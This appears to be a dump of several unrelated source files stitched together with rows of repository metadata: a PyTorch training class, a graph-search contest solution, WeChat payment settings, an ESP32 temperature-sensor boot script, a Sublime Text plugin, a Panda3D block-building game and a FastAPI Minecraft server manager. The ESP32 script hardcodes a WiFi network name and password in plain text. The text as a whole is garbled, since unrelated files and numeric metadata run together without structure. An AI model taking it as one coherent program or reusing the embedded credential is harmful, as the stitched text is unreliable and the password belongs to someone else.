var_dic["LOSS"] = loss_d = (self.output ** 2 - self.groundtruth ** 2) ** 0.5 return: loss, var_dic """ loss: torch.Tensor var_dic = {} return loss, var_dic def compute_valid(self) -> dict: """ Rewrite this method to compute your validation values. Use self.input, self.output and self.ground_truth to compute valid loss. You can return a ``dict`` of validation values that you want to visualize. Example:: # It will do the same thing as ``compute_loss()`` var_dic, _ = self.compute_loss() return var_dic """ # It will do the same thing as ``compute_loss()`` var_dic, _ = self.compute_loss() return var_dic def valid_epoch(self): """Validate model each epoch. It will be called each epoch, when training finish. So, do same verification here. Example:: avg_dic: dict = {} self.net.eval() for iteration, batch in enumerate(self.datasets.loader_valid, 1): self.input, self.ground_truth = self.get_data_from_batch(batch, self.device) with torch.no_grad(): self.output = self.net(self.input) dic: dict = self.compute_valid() if avg_dic == {}: avg_dic: dict = dic else: for key in dic.keys(): avg_dic[key] += dic[key] for key in avg_dic.keys(): avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid self.watcher.scalars(avg_dic, self.step, tag="Valid") self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.step <= 1) self._watch_images(tag="Valid") self.net.train() """ avg_dic: dict = {} self.net.eval() for iteration, batch in enumerate(self.datasets.loader_valid, 1): self.input, self.ground_truth = self.get_data_from_batch(batch, self.device) with torch.no_grad(): self.output = self.net(self.input) dic: dict = self.compute_valid() if avg_dic == {}: avg_dic: dict = dic else: # 求和 for key in dic.keys(): avg_dic[key] += dic[key] for key in avg_dic.keys(): avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid self.watcher.scalars(avg_dic, self.step, tag="Valid") self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.current_epoch <= 1) self._watch_images(tag="Valid") self.net.train() def test(self): pass
37.146465
116
0.562882
885
7,355
4.501695
0.19096
0.027108
0.03012
0.023845
0.500251
0.477159
0.433986
0.416918
0.416918
0.398845
0
0.003537
0.346431
7,355
197
117
37.335025
0.825255
0.4707
0
0.176471
0
0
0.016552
0
0
0
0
0
0
1
0.117647
false
0.014706
0.088235
0
0.264706
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822adefd2d61243c8a6b7d51a859f435ee02768e
1,433
py
Python
Gold/sol.py
papachristoumarios/IEEEXtreme11.0
4c3b5aaa71641a6d0b3e9823c4738050f2553b27
[ "MIT" ]
13
2018-10-11T14:13:56.000Z
2022-02-17T18:30:17.000Z
Gold/sol.py
papachristoumarios/IEEEXtreme11.0-PComplete
4c3b5aaa71641a6d0b3e9823c4738050f2553b27
[ "MIT" ]
null
null
null
Gold/sol.py
papachristoumarios/IEEEXtreme11.0-PComplete
4c3b5aaa71641a6d0b3e9823c4738050f2553b27
[ "MIT" ]
7
2018-10-24T08:36:59.000Z
2021-07-19T18:16:53.000Z
import heapq import sys primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53] bounds = [1] for pr in primes: bounds.append(bounds[-1]*pr) def gold(town_id): i = 0 while bounds[i] <= town_id: i += 1 return i - 1 def solve(): N, M = [int(i) for i in raw_input().split()] ids = [int(raw_input()) for _ in xrange(N)] town_gold = {town_id: gold(town_id) for town_id in ids} adj = {} for i in ids: adj[i] = [] for _ in xrange(M): i, j, w = [int(i) for i in raw_input().split()] adj[i].append((j, w)) adj[j].append((i, w)) start, end = min(ids), max(ids) visited = set() max_dist = sys.maxint/2 min_dist = {town_id: max_dist for town_id in ids} min_dist[start] = 0 queue = [(0, -gold(start), start)] while queue: curr_dist, curr_gold, curr_node = heapq.heappop(queue) if curr_node in visited: continue if curr_node == end: print -curr_gold break for next_node, dist in adj[curr_node]: if next_node in visited: continue next_dist = curr_dist + dist if min_dist[next_node] >= next_dist: min_dist[next_node] = next_dist heapq.heappush(queue, (next_dist, curr_gold-town_gold[next_node], next_node)) def main(): solve() if __name__ == "__main__": main()
26.537037
93
0.551291
222
1,433
3.346847
0.297297
0.056528
0.040377
0.021534
0.161507
0.123822
0.061911
0.061911
0
0
0
0.036735
0.31612
1,433
53
94
27.037736
0.721429
0
0
0.043478
0
0
0.005583
0
0
0
0
0
0
1
0.065217
false
0
0.043478
0
0.130435
0.021739
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822bbf9836e86e5cf6fb48c971df002aa5f8085b
511
py
Python
src/wechat/settings.py
chuter/wechat-requests
23591f8e04e795a1727e6a8029602cfb2dde90f1
[ "MIT" ]
3
2019-06-17T10:54:03.000Z
2021-01-29T08:25:01.000Z
src/wechat/settings.py
chuter/wechat-requests
23591f8e04e795a1727e6a8029602cfb2dde90f1
[ "MIT" ]
2
2020-03-24T15:46:37.000Z
2020-03-30T20:26:19.000Z
src/wechat/settings.py
chuter/wechat-requests
23591f8e04e795a1727e6a8029602cfb2dde90f1
[ "MIT" ]
null
null
null
# -*- encoding: utf-8 from .utils import build_user_agent # common DEFAULT_HEADERS = { 'User-Agent': build_user_agent() } TIMEOUT = 1 ENCODING = 'utf-8' RETRYS = 3 RETRY_BACKOFF_FACTOR = 0.1 RETRY_STATUS_FORCELIST = frozenset([500, 502, 504]) # auth OAUTH_HOST = 'open.weixin.qq.com' AUTH_EXPIRED_CODES = frozenset([40001, 40014, 41001, 42001]) # pay TRADE_TYPE_JSAPI = 'JSAPI' # 公众号支付 TRADE_TYPE_NATIVE = 'NATIVE' # 扫码支付 TRADE_TYPE_APP = 'APP' # APP支付 SIGN_TYPE = 'MD5' SIGN_NONCE_STR_LEN = 32
17.033333
60
0.712329
75
511
4.56
0.72
0.078947
0.070175
0
0
0
0
0
0
0
0
0.088785
0.162427
511
29
61
17.62069
0.71028
0.101761
0
0
0
0
0.110865
0
0
0
0
0
0
1
0
false
0
0.0625
0
0.0625
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822c0a167631eafd04070f9a246d9fdcf6b1dbe4
533
py
Python
esp32/tempsensor/boot.py
Steve-Fisher/PiExperiments
81a08b99b53ed9921353cf436b09b40650032a2b
[ "MIT" ]
null
null
null
esp32/tempsensor/boot.py
Steve-Fisher/PiExperiments
81a08b99b53ed9921353cf436b09b40650032a2b
[ "MIT" ]
null
null
null
esp32/tempsensor/boot.py
Steve-Fisher/PiExperiments
81a08b99b53ed9921353cf436b09b40650032a2b
[ "MIT" ]
null
null
null
try: import usocket as socket except: import socket from time import sleep from machine import Pin import onewire, ds18x20 import network import esp esp.osdebug(None) import gc gc.collect() ds_pin = Pin(4) ds_sensor = ds18x20.DS18X20(onewire.OneWire(ds_pin)) ssid = 'ATC24' password = 'Svalbard' station = network.WLAN(network.STA_IF) station.active(True) station.connect(ssid, password) while station.isconnected() == False: pass #print(station.ifconfig()) print('Connection successful') print(station.ifconfig())
15.228571
52
0.756098
73
533
5.465753
0.561644
0.025063
0.100251
0
0
0
0
0
0
0
0
0.032538
0.135084
533
35
53
15.228571
0.832972
0.046904
0
0
0
0
0.066929
0
0
0
0
0
0
1
0
false
0.130435
0.347826
0
0.347826
0.086957
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
0
0
0
2
822c63b5e55693f8beb5a21c86e5722b43fcabfd
1,070
py
Python
leetcode/0242_valid_anagram.py
chaosWsF/Python-Practice
ff617675b6bcd125933024bb4c246b63a272314d
[ "BSD-2-Clause" ]
null
null
null
leetcode/0242_valid_anagram.py
chaosWsF/Python-Practice
ff617675b6bcd125933024bb4c246b63a272314d
[ "BSD-2-Clause" ]
null
null
null
leetcode/0242_valid_anagram.py
chaosWsF/Python-Practice
ff617675b6bcd125933024bb4c246b63a272314d
[ "BSD-2-Clause" ]
null
null
null
""" Given two strings s and t , write a function to determine if t is an anagram of s. Example 1: Input: s = "anagram", t = "nagaram" Output: true Example 2: Input: s = "rat", t = "car" Output: false Note: You may assume the string contains only lowercase alphabets. Follow up: What if the inputs contain unicode characters? How would you adapt your solution to such case? """ from collections import Counter class Solution: def isAnagram1(self, s, t): return sorted(s) == sorted(t) def isAnagram2(self, s, t): if len(s) != len(t): return False d_s = {} d_t = {} for ss, tt in zip(s, t): if ss in d_s: d_s[ss] += 1 else: d_s[ss] = 1 if tt in d_t: d_t[tt] += 1 else: d_t[tt] = 1 return d_s == d_t def isAnagram3(self, s, t): # 28ms, 13MB return Counter(s) == Counter(t) if len(s) == len(t) else False
22.291667
98
0.507477
155
1,070
3.43871
0.464516
0.018762
0.033771
0.026266
0.041276
0.041276
0
0
0
0
0
0.02
0.392523
1,070
47
99
22.765957
0.8
0.382243
0
0.095238
0
0
0
0
0
0
0
0
0
1
0.142857
false
0
0.047619
0.095238
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822e6649f5126724e28587501bc18c3cf971a81b
4,144
py
Python
phpcsfixer.py
makao/sublime-php-cs-fixer
ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5
[ "MIT" ]
1
2018-11-26T19:42:41.000Z
2018-11-26T19:42:41.000Z
phpcsfixer.py
makao/sublime-php-cs-fixer
ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5
[ "MIT" ]
2
2018-01-10T05:15:08.000Z
2018-12-04T15:41:29.000Z
phpcsfixer.py
makao/sublime-php-cs-fixer
ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5
[ "MIT" ]
null
null
null
import os import re import sublime import sublime_plugin import subprocess STVER = int(sublime.version()) class PHPCSFixer(): def __init__(self): self.settings = PhpCsFixerSettings() if sublime.active_window() is not None and sublime.active_window().active_view() is not None: self.file = sublime.active_window().active_view().file_name() def run(self, file=None): if file is None: file = self.file if not self.settings.isPHPFile(): return if not self.settings.isAllowedExtension(file): return cmd = self.buildCommand(file) result = self.execute(cmd) self.showOutput(result) def buildCommand(self, file): rules = self.settings.get('rules') if (self.settings.get('executable')): cmd = [self.settings.get('executable')] else: cmd = ['php-cs-fixer'] cmd.append('fix'); cmd.append(os.path.normpath(file)) cmd.append('-vvv') cmd.append('--using-cache=no') if rules is None or not rules: return cmd rules_list = '--rules=' for rule in rules: rules_list += rule + ',' cmd.append(rules_list[:-1]) return cmd def execute(self, cmd): process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) return process.communicate()[0].decode() def showOutput(self, result): lines = re.finditer('.*(?P<line>\d+)\) (?P<file>.*)', result) files = [] for line in lines: file = line.group('file') rules = file[file.find("(")+1:file.find(")")] file = re.sub('\(.*?\)','', file) files.append([os.path.basename(file), rules]) sublime.active_window().show_quick_panel(files, self.onDone) def onDone(selected, self): return class PhpCsFixerFixCommand(sublime_plugin.TextCommand): def run(edit, self): PHPCSFixer().run() class PhpCsFixerEventListener(sublime_plugin.EventListener): def on_post_save(self, view): settings = PhpCsFixerSettings() if not settings.get('on_save'): return PHPCSFixer().run(view.file_name()) class PhpCsFixerSettings(): def __init__(self): if sublime.active_window() is not None and sublime.active_window().active_view() is not None: self.sublime = sublime.active_window().active_view().settings() self.project = self.sublime.get('php-cs-fixer') else: self.sublime = {} self.project = {} self.plugin = sublime.load_settings('PHPCSFixer.sublime-settings') def get(self, key, default=None): if self.project is not None and self.project.get(key) is not None: return self.project.get(key) if self.plugin.get(key) is not None: return self.plugin.get(key) return default def isPHPFile(self): syntax = self.sublime.get('syntax') if syntax is None: return False if syntax.endswith('PHP.tmLanguage') or syntax.endswith('PHP.sublime-syntax'): return True return False def isAllowedExtension(self, filename): ignored = self.get('ignored_extensions', []) for ext in ignored: if filename.endswith(ext): return False return True class PhpCsFixerOpenFileCommand(sublime_plugin.ApplicationCommand): @staticmethod def run(file): platform_name = { 'osx': 'OSX', 'windows': 'Windows', 'linux': 'Linux', }[sublime.platform()] file = file.replace('${platform}', platform_name) sublime.run_command('open_file', {'file': file}) @staticmethod def is_visible(): return STVER < 3124 class PhpCsFixerEditSettingsCommand(sublime_plugin.ApplicationCommand): @staticmethod def run(**kwargs): sublime.run_command('edit_settings', kwargs) @staticmethod def is_visible(): return STVER >= 3124
27.812081
112
0.600386
464
4,144
5.267241
0.247845
0.037234
0.054419
0.040917
0.177578
0.153846
0.113748
0.061375
0.061375
0.061375
0
0.003663
0.275338
4,144
148
113
28
0.81019
0
0
0.211009
0
0
0.067809
0.006515
0
0
0
0
0
1
0.146789
false
0
0.045872
0.027523
0.40367
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8231b27b0d3005be97ff413b652254876cb7dd03
686
py
Python
src/dal/deleter.py
pgecsenyi/piepy
37bf6cb5bc8c4f9da3f695216beda7353d79fb29
[ "MIT" ]
1
2018-03-26T22:39:36.000Z
2018-03-26T22:39:36.000Z
src/dal/deleter.py
pgecsenyi/piepy
37bf6cb5bc8c4f9da3f695216beda7353d79fb29
[ "MIT" ]
null
null
null
src/dal/deleter.py
pgecsenyi/piepy
37bf6cb5bc8c4f9da3f695216beda7353d79fb29
[ "MIT" ]
null
null
null
class Deleter: #################################################################################################################### # Constructor. #################################################################################################################### def __init__(self, db_context): """ Initializes attributes. Parameters ---------- db_context : DbContext The database context to work with. """ ### Validate parameters. if db_context is None: raise Exception('db_context cannot be None.') ### Attributes from outside. self._db_context = db_context
29.826087
120
0.355685
42
686
5.547619
0.642857
0.23176
0.111588
0
0
0
0
0
0
0
0
0
0.244898
686
22
121
31.181818
0.449807
0.244898
0
0
0
0
0.116071
0
0
0
0
0
0
1
0.2
false
0
0
0
0.4
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
8231f730c04eb4d6e810e9c69386be194b173415
16,027
py
Python
main.py
PlumpMath/Panda3DCraft
7bf5b658af7809249c6bc78d059506e738546812
[ "MIT" ]
1
2021-08-07T14:05:27.000Z
2021-08-07T14:05:27.000Z
main.py
PlumpMath/Panda3DCraft
7bf5b658af7809249c6bc78d059506e738546812
[ "MIT" ]
null
null
null
main.py
PlumpMath/Panda3DCraft
7bf5b658af7809249c6bc78d059506e738546812
[ "MIT" ]
1
2021-08-15T14:50:47.000Z
2021-08-15T14:50:47.000Z
from panda3d.core import * from direct.gui.DirectGui import * from direct.showbase.ShowBase import ShowBase from noise import snoise2 import os import random from Block import * loadPrcFile('config/general.prc') if __debug__: loadPrcFile('config/dev.prc') base = ShowBase() octavesElev = 5 octavesRough = 2 octavesDetail = 1 freq = 16.0 * octavesElev world = {} verboseLogging = False fancyRendering = False wantNewGeneration = False fillWorld = False base.setFrameRateMeter(True) paused = False inventory = [DIRT, COBBLESTONE, GLASS, GRASS, BRICKS, WOOD, LEAVES, PLANKS, STONE] currentBlock = inventory[0] currentSelectedText = DirectLabel(text = "Current block:", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.9)) currentBlockText = DirectLabel(text = blockNames[currentBlock], text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = aspect2d, scale = 0.05, pos = (0,0,-0.95)) def pause(): global paused paused = not paused if paused: base.disableMouse() pauseScreen.showPause() else: base.enableMouse() pauseScreen.hide() class PauseScreen: def __init__(self): self.pauseScr = aspect2d.attachNewNode("pause") # This is used so that everything can be stashed at once... except for dim, which is on render2d self.loadScr = aspect2d.attachNewNode("load") # It also helps for flipping between screens self.saveScr = aspect2d.attachNewNode("save") cm = CardMaker('card') self.dim = render2d.attachNewNode(cm.generate()) self.dim.setPos(-1, 0, -1) self.dim.setScale(2) self.dim.setTransparency(1) self.dim.setColor(0, 0, 0, 0.5) self.buttonModel = loader.loadModel('gfx/button') inputTexture = loader.loadTexture('gfx/tex/button_press.png') # Pause Screen self.unpauseButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.3), text = "Resume Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = pause) self.saveButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, 0.15), text = "Save Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showSave) self.loadButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.15), text = "Load Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showLoad) self.exitButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.pauseScr, scale = 0.5, pos = (0, 0, -0.3), text = "Quit Game", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = exit) # Save Screen self.saveText = DirectLabel(text = "Type in a name for your world", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.075, pos = (0,0,0.35)) self.saveText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.saveScr, scale = 0.06, pos = (0,0,-0.45)) self.saveName = DirectEntry(text = "", scale= .15, command=self.save, initialText="My World", numLines = 1, focus=1, frameTexture = inputTexture, parent = self.saveScr, text_fg = (1,1,1,1), pos = (-0.6, 0, 0.1), text_scale = 0.75) self.saveGameBtn = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.1), text = "Save", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.save) self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.saveScr, scale = 0.5, pos = (0, 0, -0.25), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause) # Load Screen numItemsVisible = 3 itemHeight = 0.15 self.loadList = DirectScrolledList( decButton_pos= (0.35, 0, 0.5), decButton_text = "^", decButton_text_scale = 0.04, decButton_text_pos = (0, -0.025), decButton_text_fg = (1, 1, 1, 1), decButton_borderWidth = (0.005, 0.005), decButton_scale = (1.5, 1, 2), decButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), decButton_geom_scale = 0.1, decButton_relief = None, incButton_pos= (0.35, 0, 0), incButton_text = "^", incButton_text_scale = 0.04, incButton_text_pos = (0, -0.025), incButton_text_fg = (1, 1, 1, 1), incButton_borderWidth = (0.005, 0.005), incButton_hpr = (0,180,0), incButton_scale = (1.5, 1, 2), incButton_geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), incButton_geom_scale = 0.1, incButton_relief = None, frameSize = (-0.4, 1.1, -0.1, 0.59), frameTexture = inputTexture, frameColor = (1, 1, 1, 0.75), pos = (-0.45, 0, -0.25), scale = 1.25, numItemsVisible = numItemsVisible, forceHeight = itemHeight, itemFrame_frameSize = (-0.2, 0.2, -0.37, 0.11), itemFrame_pos = (0.35, 0, 0.4), itemFrame_frameColor = (0,0,0,0), parent = self.loadScr ) self.backButton = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, parent = self.loadScr, scale = 0.5, pos = (0, 0, -0.5), text = "Back", text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.showPause) self.loadText = DirectLabel(text = "Select World", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,0.55)) self.loadText2 = DirectLabel(text = "", text_fg = (1,1,1,1), frameColor = (0,0,0,0), parent = self.loadScr, scale = 0.075, pos = (0,0,-0.7)) self.hide() def showPause(self): self.saveScr.stash() self.loadScr.stash() self.pauseScr.unstash() self.dim.unstash() def showSave(self): self.pauseScr.stash() self.saveScr.unstash() self.saveText2['text'] = "" def showLoad(self): self.pauseScr.stash() self.loadScr.unstash() self.loadText2['text'] = "" self.loadList.removeAndDestroyAllItems() f = [] if not os.path.exists('saves/'): os.makedirs('saves/') for (dirpath, dirnames, filenames) in os.walk('saves/'): f.extend(filenames) break for file in f: l = DirectButton(geom = (self.buttonModel.find('**/button_up'), self.buttonModel.find('**/button_press'), self.buttonModel.find('**/button_over'), self.buttonModel.find('**/button_disabled')), relief = None, scale = 0.5, pos = (0, 0, -0.75), text = file.strip('.sav'), text_fg = (1,1,1,1), text_scale = 0.1, text_pos = (0, -0.04), command = self.load, extraArgs = [file]) self.loadList.addItem(l) def save(self, worldName = None): self.saveText2['text'] = "Saving..." if worldName == None: worldName = self.saveName.get(True) print "Saving %s..." % worldName dest = 'saves/%s.sav' % worldName dir = os.path.dirname(dest) if not os.path.exists(dir): os.makedirs(dir) try: f = open(dest, 'wt') except IOError: self.saveText2['text'] = "Could not save. Make sure the world name does not contain the following characters: \\ / : * ? \" < > |" print "Failed!" return for key in world: if world[key].type == AIR: continue f.write(str(key) + ':') f.write(str(world[key].type) + '\n') f.close() self.saveText2['text'] = "Saved!" print "Saved!" def load(self, worldName): self.loadText2['text'] = "Loading..." print "Loading..." f = open('saves/%s' % worldName, 'r') toLoad = f.read().split('\n') toLoad.pop() # get rid of newline for key in world: addBlock(AIR, key[0], key[1], key[2]) world.clear() for key in toLoad: key = key.split(':') posTup = eval(key[0]) addBlock(int(key[1]), posTup[0], posTup[1], posTup[2]) f.close() self.loadText2['text'] = "Loaded!" print "Loaded!" def hide(self): self.pauseScr.stash() self.loadScr.stash() self.saveScr.stash() self.dim.stash() pauseScreen = PauseScreen() def addBlock(blockType,x,y,z): try: world[(x,y,z)].cleanup() except: pass block = Block(blockType, x, y, z) world[(x,y,z)] = block return for x in xrange(0, 16): for y in xrange(0, 16): amplitude = random.randrange(0.0,5.0) blockType = DIRT if wantNewGeneration: z = max(min(int(snoise2(x / freq, y / freq, octavesElev)+(snoise2(x / freq, y / freq, octavesRough)*snoise2(x / freq, y / freq, octavesDetail))*64+64), 128), 0) addBlock(blockType,x,y,z) else: z = max((int(snoise2(x / freq, y / freq, 5) * amplitude)+8), 0) addBlock(blockType,x,y,z) if fillWorld: for height in xrange(0, z+1): addBlock(blockType,x,y,height) if verboseLogging: print "Generated %s at (%d, %d, %d)" % (blockNames[blockType], x, y, z) alight = AmbientLight('alight') alight.setColor(VBase4(0.6, 0.6, 0.6, 1)) alnp = render.attachNewNode(alight) render.setLight(alnp) slight = Spotlight('slight') slight.setColor(VBase4(1, 1, 1, 1)) lens = PerspectiveLens() slight.setLens(lens) slnp = render.attachNewNode(slight) slnp.setPos(8, -9, 128) slnp.setHpr(0,270,0) render.setLight(slnp) if fancyRendering: # Use a 512x512 resolution shadow map slight.setShadowCaster(True, 512, 512) # Enable the shader generator for the receiving nodes render.setShaderAuto() traverser = CollisionTraverser() handler = CollisionHandlerQueue() pickerNode = CollisionNode('mouseRay') pickerNP = camera.attachNewNode(pickerNode) pickerNode.setFromCollideMask(GeomNode.getDefaultCollideMask()) pickerRay = CollisionRay() pickerNode.addSolid(pickerRay) traverser.addCollider(pickerNP, handler) def handlePick(right=False): if paused: return # no if base.mouseWatcherNode.hasMouse(): mpos = base.mouseWatcherNode.getMouse() pickerRay.setFromLens(base.camNode, mpos.getX(), mpos.getY()) traverser.traverse(render) if handler.getNumEntries() > 0: handler.sortEntries() pickedObj = handler.getEntry(0).getIntoNodePath() pickedObj = pickedObj.findNetTag('blockTag') if not pickedObj.isEmpty(): if right: handleRightPickedObject(pickedObj, handler.getEntry(0).getIntoNodePath().findNetTag('westTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('northTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('eastTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('southTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('topTag').isEmpty(), handler.getEntry(0).getIntoNodePath().findNetTag('botTag').isEmpty()) else: handlePickedObject(pickedObj) def hotbarSelect(slot): global currentBlock currentBlock = inventory[slot-1] currentBlockText["text"] = blockNames[currentBlock] if verboseLogging: print "Selected hotbar slot %d" % slot print "Current block: %s" % blockNames[currentBlock] base.accept('mouse1', handlePick) base.accept('mouse3', handlePick, extraArgs=[True]) base.accept('escape', pause) base.accept('1', hotbarSelect, extraArgs=[1]) base.accept('2', hotbarSelect, extraArgs=[2]) base.accept('3', hotbarSelect, extraArgs=[3]) base.accept('4', hotbarSelect, extraArgs=[4]) base.accept('5', hotbarSelect, extraArgs=[5]) base.accept('6', hotbarSelect, extraArgs=[6]) base.accept('7', hotbarSelect, extraArgs=[7]) base.accept('8', hotbarSelect, extraArgs=[8]) base.accept('9', hotbarSelect, extraArgs=[9]) def handlePickedObject(obj): if verboseLogging: print "Left clicked a block at %d, %d, %d" % (obj.getX(), obj.getY(), obj.getZ()) addBlock(AIR, obj.getX(), obj.getY(), obj.getZ()) def handleRightPickedObject(obj, west, north, east, south, top, bot): if verboseLogging: print "Right clicked a block at %d, %d, %d, attempting to place %s" % (obj.getX(), obj.getY(), obj.getZ(), blockNames[currentBlock]) try: # not [block face] checks to see if the user clicked on [block face]. this is not confusing at all. if world[(obj.getX()-1, obj.getY(), obj.getZ())].type == AIR and not west: addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ()) elif world[(obj.getX()+1, obj.getY(), obj.getZ())].type == AIR and not east: addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ()) elif world[(obj.getX(), obj.getY()-1, obj.getZ())].type == AIR and not south: addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ()) elif world[(obj.getX(), obj.getY()+1, obj.getZ())].type == AIR and not north: addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ()) elif world[(obj.getX(), obj.getY(), obj.getZ()+1)].type == AIR and not top: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1) elif world[(obj.getX(), obj.getY(), obj.getZ()-1)].type == AIR and not bot: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1) except KeyError: if not west: addBlock(currentBlock, obj.getX()-1, obj.getY(), obj.getZ()) elif not east: addBlock(currentBlock, obj.getX()+1, obj.getY(), obj.getZ()) elif not south: addBlock(currentBlock, obj.getX(), obj.getY()-1, obj.getZ()) elif not north: addBlock(currentBlock, obj.getX(), obj.getY()+1, obj.getZ()) elif not top: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()+1) elif not bot: addBlock(currentBlock, obj.getX(), obj.getY(), obj.getZ()-1) fog = Fog("fog") fog.setColor(0.5294, 0.8078, 0.9215) fog.setExpDensity(0.015) render.setFog(fog) base.camLens.setFar(256) base.run()
45.274011
217
0.608099
2,043
16,027
4.715125
0.190406
0.014118
0.078895
0.10381
0.432368
0.396242
0.346517
0.339147
0.335929
0.335929
0
0.043198
0.225806
16,027
353
218
45.402266
0.733156
0.023835
0
0.141414
0
0.037037
0.08328
0.001535
0
0
0
0
0
0
null
null
0.003367
0.023569
null
null
0.03367
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
8234be85b1a5c920b993e015367a06c4e394d65b
11,961
py
Python
main.py
iTecAI/minecraft-socket
72f3bbc4fb20bea4b837d093c734eab2798de89d
[ "MIT" ]
null
null
null
main.py
iTecAI/minecraft-socket
72f3bbc4fb20bea4b837d093c734eab2798de89d
[ "MIT" ]
null
null
null
main.py
iTecAI/minecraft-socket
72f3bbc4fb20bea4b837d093c734eab2798de89d
[ "MIT" ]
null
null
null
from json.decoder import JSONDecodeError from fastapi import FastAPI, Response, Request from fastapi.staticfiles import StaticFiles from argparse import ArgumentParser from starlette.status import * from starlette.responses import FileResponse, JSONResponse import uvicorn import os from pymongo import MongoClient from pymongo.database import Database import json from util import fetch_jarinfo, defaults import logging from logging import debug, info, warning, error, critical, exception import threading import time from models import * import hashlib import random import server_manager import requests import base64 AUTHENTICATED_CONNECTIONS = {} def fetch_loop(db: Database): WAIT = 12 # Delay between fetches (hours) while True: info('Fetching minecraft version info.') jar_info = fetch_jarinfo() jar_info['record'] = 'versions' info('Found {mc} vanilla versions and {paper} papermc versions. Latest version is {latest}. Latest snapshot is {latest_snap}.'.format( mc=str(len(jar_info['vanilla'])), paper=str(len(jar_info['paper'])), latest=jar_info['latest']['release'], latest_snap=jar_info['latest']['snapshot'] )) db.versions.replace_one({'record': 'versions'}, jar_info, upsert=True) time.sleep(WAIT * 3600) if __name__ == '__main__': parser = 